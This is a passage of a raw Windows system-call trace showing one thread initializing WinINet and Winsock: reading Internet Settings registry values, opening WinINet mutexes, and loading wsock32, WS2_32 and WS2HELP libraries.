 03454   456   NtQueryInformationFile  (400, 1237888, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03455   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03456   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03457   456   NtQueryInformationFile  (400, 1237960, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03458   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03459   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03460   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03461   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03462   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03463   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03464   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 440, ) }, ... 440, ) == 0x0
 03465   456   NtQueryValueKey  (440,  (440, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03466   456   NtClose  (440, ... ) == 0x0
 03467   456   NtQueryValueKey  (376,  (376, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03468   456   NtQueryValueKey  (376,  (376, "DisableReadRange", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03469   456   NtQueryValueKey  (376,  (376, "SocketSendBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03470   456   NtQueryValueKey  (376,  (376, "SocketReceiveBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03471   456   NtQueryValueKey  (376,  (376, "KeepAliveTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03472   456   NtQueryValueKey  (376,  (376, "MaxHttpRedirects", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03473   456   NtQueryValueKey  (376,  (376, "MaxConnectionsPerServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03474   456   NtQueryValueKey  (376,  (376, "MaxConnectionsPer1_0Server", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03475   456   NtQueryValueKey  (376,  (376, "ServerInfoTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03476   456   NtQueryValueKey  (376,  (376, "ReceiveTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03477   456   NtQueryValueKey  (376,  (376, "DisableNTLMPreAuth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03478   456   NtQueryValueKey  (376,  (376, "ScavengeCacheLowerBound", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03479   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 440, ) }, ... 440, ) == 0x0
 03480   456   NtQueryValueKey  (440,  (440, "ScavengeCacheFileLifeTime", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03481   456   NtClose  (440, ... ) == 0x0
 03482   456   NtQueryValueKey  (376,  (376, "HttpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03483   456   NtQueryValueKey  (376,  (376, "FtpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03484   456   NtQueryValueKey  (376,  (376, "GopherDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03485   456   NtQueryValueKey  (376,  (376, "DisableCachingOfSSLPages", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03486   456   NtQueryValueKey  (376,  (376, "PerUserCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03487   456   NtQueryValueKey  (376,  (376, "LeashLegacyCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03488   456   NtQueryValueKey  (376,  (376, "DisableNT4RasCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03489   456   NtQueryValueKey  (376,  (376, "DialupUseLanSettings", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03490   456   NtQueryValueKey  (376,  (376, "SendExtraCRLF", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03491   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 440, ) }, ... 440, ) == 0x0
 03492   456   NtQueryValueKey  (440,  (440, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03493   456   NtClose  (440, ... ) == 0x0
 03494   456   NtQueryValueKey  (376,  (376, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03495   456   NtQueryValueKey  (376,  (376, "NonBlockingClient32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03496   456   NtQueryValueKey  (376,  (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 03497   456   NtQueryValueKey  (376,  (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 03498   456   NtQueryValueKey  (376,  (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 03499   456   NtQueryValueKey  (376,  (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (376, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 03500   456   NtQueryValueKey  (376,  (376, "HeaderExclusionListForCache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03501   456   NtQueryValueKey  (376,  (376, "DnsCacheEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03502   456   NtQueryValueKey  (376,  (376, "DnsCacheEntries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03503   456   NtQueryValueKey  (376,  (376, "DnsCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03504   456   NtQueryValueKey  (376,  (376, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (376, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03505   456   NtQueryValueKey  (376,  (376, "WarnAlwaysOnPost", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03506   456   NtQueryValueKey  (376,  (376, "WarnOnZoneCrossing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03507   456   NtQueryValueKey  (376,  (376, "WarnOnBadCertSending", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03508   456   NtQueryValueKey  (376,  (376, "WarnOnBadCertRecving", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03509   456   NtQueryValueKey  (376,  (376, "WarnOnPostRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03510   456   NtQueryValueKey  (376,  (376, "AlwaysDrainOnRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03511   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "WininetStartupMutex"}, ... 440, ) }, ... 440, ) == 0x0
 03512   456   NtCreateEvent  (0x1f0003, 0x0, 1, 1, ... 436, ) == 0x0
 03513   456   NtQueryValueKey  (376,  (376, "GlobalUserOffline", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03514   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03515   456   NtQueryInformationFile  (400, 1237936, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03516   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03517   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "WininetConnectionMutex"}, ... 448, ) }, ... 448, ) == 0x0
 03518   456   NtCreateMutant  (0x1f0001, 0x0, 0, ... 452, ) == 0x0
 03519   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "WininetProxyRegistryMutex"}, ... 456, ) }, ... 456, ) == 0x0
 03520   456   NtQueryValueKey  (376,  (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03521   456   NtQueryValueKey  (376,  (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03522   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 460, ) }, ... 460, ) == 0x0
 03523   456   NtQueryValueKey  (460,  (460, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (460, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0
 03524   456   NtQueryValueKey  (460,  (460, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (460, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0
 03525   456   NtClose  (460, ... ) == 0x0
 03526   456   NtAllocateVirtualMemory  (-1, 1499136, 0, 4096, 4096, 4, ... 1499136, 4096, ) == 0x0
 03527   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03528   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent"}, ... 460, ) }, ... 460, ) == 0x0
 03529   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03530   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03531   456   NtOpenKey  (0x1, {24, 460, 0x40, 0, 0,  (0x1, {24, 460, 0x40, 0, 0, "UA Tokens"}, ... 464, ) }, ... 464, ) == 0x0
 03532   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 468, ) }, ... 468, ) == 0x0
 03533   456   NtQueryValueKey  (468,  (468, "User Agent", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0o\0z\0i\0l\0l\0a\0/\04\0.\00\0 \0(\0c\0o\0m\0p\0a\0t\0i\0b\0l\0e\0;\0 \0M\0S\0I\0E\0 \06\0.\00\0;\0 \0W\0i\0n\03\02\0)\0\0\0"}, 96, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (468, "User Agent", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0o\0z\0i\0l\0l\0a\0/\04\0.\00\0 \0(\0c\0o\0m\0p\0a\0t\0i\0b\0l\0e\0;\0 \0M\0S\0I\0E\0 \06\0.\00\0;\0 \0W\0i\0n\03\02\0)\0\0\0"}, 96, ) }, 96, ) == 0x0
 03534   456   NtQueryValueKey  (468,  (468, "User Agent", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0o\0z\0i\0l\0l\0a\0/\04\0.\00\0 \0(\0c\0o\0m\0p\0a\0t\0i\0b\0l\0e\0;\0 \0M\0S\0I\0E\0 \06\0.\00\0;\0 \0W\0i\0n\03\02\0)\0\0\0"}, 96, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (468, "User Agent", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0o\0z\0i\0l\0l\0a\0/\04\0.\00\0 \0(\0c\0o\0m\0p\0a\0t\0i\0b\0l\0e\0;\0 \0M\0S\0I\0E\0 \06\0.\00\0;\0 \0W\0i\0n\03\02\0)\0\0\0"}, 96, ) }, 96, ) == 0x0
 03535   456   NtClose  (468, ... ) == 0x0
 03536   456   NtEnumerateValueKey  (464, 0, Full, 220, ... TitleIdx=0, Type=1, Name=" (464, 0, Full, 220, ... TitleIdx=0, Type=1, Name="", Data="\0\0"}, 22, ) \0\0"}, 22, ) == 0x0
 03537   456   NtEnumerateValueKey  (464, 1, Full, 220, ... TitleIdx=0, Type=1, Name= (464, 1, Full, 220, ... TitleIdx=0, Type=1, Name="MSN 2.0", Data="\0\0"}, 38, ) , Data= (464, 1, Full, 220, ... TitleIdx=0, Type=1, Name="MSN 2.0", Data="\0\0"}, 38, ) }, 38, ) == 0x0
 03538   456   NtEnumerateValueKey  (464, 2, Full, 220, ... TitleIdx=0, Type=1, Name= (464, 2, Full, 220, ... TitleIdx=0, Type=1, Name="MSN 2.5", Data="\0\0"}, 38, ) , Data= (464, 2, Full, 220, ... TitleIdx=0, Type=1, Name="MSN 2.5", Data="\0\0"}, 38, ) }, 38, ) == 0x0
 03539   456   NtEnumerateValueKey  (464, 3, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 03540   456   NtClose  (464, ... ) == 0x0
 03541   456   NtOpenKey  (0x1, {24, 460, 0x40, 0, 0,  (0x1, {24, 460, 0x40, 0, 0, "Pre Platform"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03542   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03543   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 03544   456   NtOpenKey  (0x1, {24, 460, 0x40, 0, 0,  (0x1, {24, 460, 0x40, 0, 0, "Post Platform"}, ... 464, ) }, ... 464, ) == 0x0
 03545   456   NtEnumerateValueKey  (464, 0, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 03546   456   NtClose  (464, ... ) == 0x0
 03547   456   NtClose  (460, ... ) == 0x0
 03548   456   NtCreateEvent  (0x1f0003, 0x0, 1, 1, ... 460, ) == 0x0
 03549   456   NtWaitForSingleObject  (460, 0, 0x0, ... ) == 0x0
 03550   456   NtClearEvent  (460, ... ) == 0x0
 03551   456   NtSetEvent  (460, ... 0x0, ) == 0x0
 03552   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wsock32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03553   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wsock32.dll"}, 1236012, ... ) }, 1236012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03554   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "wsock32.dll"}, 1236012, ... ) }, 1236012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03555   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wsock32.dll"}, 1236012, ... ) }, 1236012, ... ) == 0x0
 03556   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wsock32.dll"}, 5, 96, ... 464, {status=0x0, info=1}, ) }, 5, 96, ... 464, {status=0x0, info=1}, ) == 0x0
 03557   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 464, ... 468, ) == 0x0
 03558   456   NtQuerySection  (468, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03559   456   NtClose  (464, ... ) == 0x0
 03560   456   NtMapViewOfSection  (468, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71ad0000), 0x0, 32768, ) == 0x0
 03561   456   NtClose  (468, ... ) == 0x0
 03562   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WS2_32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03563   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\WS2_32.dll"}, 1235208, ... ) }, 1235208, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03564   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "WS2_32.dll"}, 1235208, ... ) }, 1235208, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03565   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WS2_32.dll"}, 1235208, ... ) }, 1235208, ... ) == 0x0
 03566   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WS2_32.dll"}, 5, 96, ... 468, {status=0x0, info=1}, ) }, 5, 96, ... 468, {status=0x0, info=1}, ) == 0x0
 03567   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 468, ... 464, ) == 0x0
 03568   456   NtQuerySection  (464, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03569   456   NtClose  (468, ... ) == 0x0
 03570   456   NtMapViewOfSection  (464, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71ab0000), 0x0, 86016, ) == 0x0
 03571   456   NtClose  (464, ... ) == 0x0
 03572   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WS2HELP.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03573   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\WS2HELP.dll"}, 1234404, ... ) }, 1234404, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03574   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "WS2HELP.dll"}, 1234404, ... ) }, 1234404, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03575   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WS2HELP.dll"}, 1234404, ... ) }, 1234404, ... ) == 0x0
 03576   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WS2HELP.dll"}, 5, 96, ... 464, {status=0x0, info=1}, ) }, 5, 96, ... 464, {status=0x0, info=1}, ) == 0x0
 03577   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 464, ... 468, ) == 0x0
 03578   456   NtQuerySection  (468, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03579   456   NtClose  (464, ... ) == 0x0
 03580   456   NtMapViewOfSection  (468, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71aa0000), 0x0, 32768, ) == 0x0
 03581   456   NtClose  (468, ... ) == 0x0
 03582   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03583   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 03584   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\WinSock2\Parameters"}, ... 468, ) }, ... 468, ) == 0x0
 03585   456   NtQueryValueKey  (468,  (468, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (468, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
 03586   456   NtQueryValueKey  (468,  (468, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (468, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
 03587   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 464, ) == 0x0
 03588   456   NtOpenKey  (0x2000000, {24, 468, 0x40, 0, 0,  (0x2000000, {24, 468, 0x40, 0, 0, "Protocol_Catalog9"}, ... 472, ) }, ... 472, ) == 0x0
 03589   456   NtQueryValueKey  (472,  (472, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\31\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (472, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\31\0\0\0"}, 16, ) }, 16, ) == 0x0
 03590   456   NtNotifyChangeKey  (472, 464, 0, 0, 2011390432, 1, 0, 0, 0, 1, ... ) == 0x103
 03591   456   NtQueryValueKey  (472,  (472, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\31\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (472, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\31\0\0\0"}, 16, ) }, 16, ) == 0x0
 03592   456   NtOpenKey  (0x2000000, {24, 472, 0x40, 0, 0,  (0x2000000, {24, 472, 0x40, 0, 0, "00000019"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
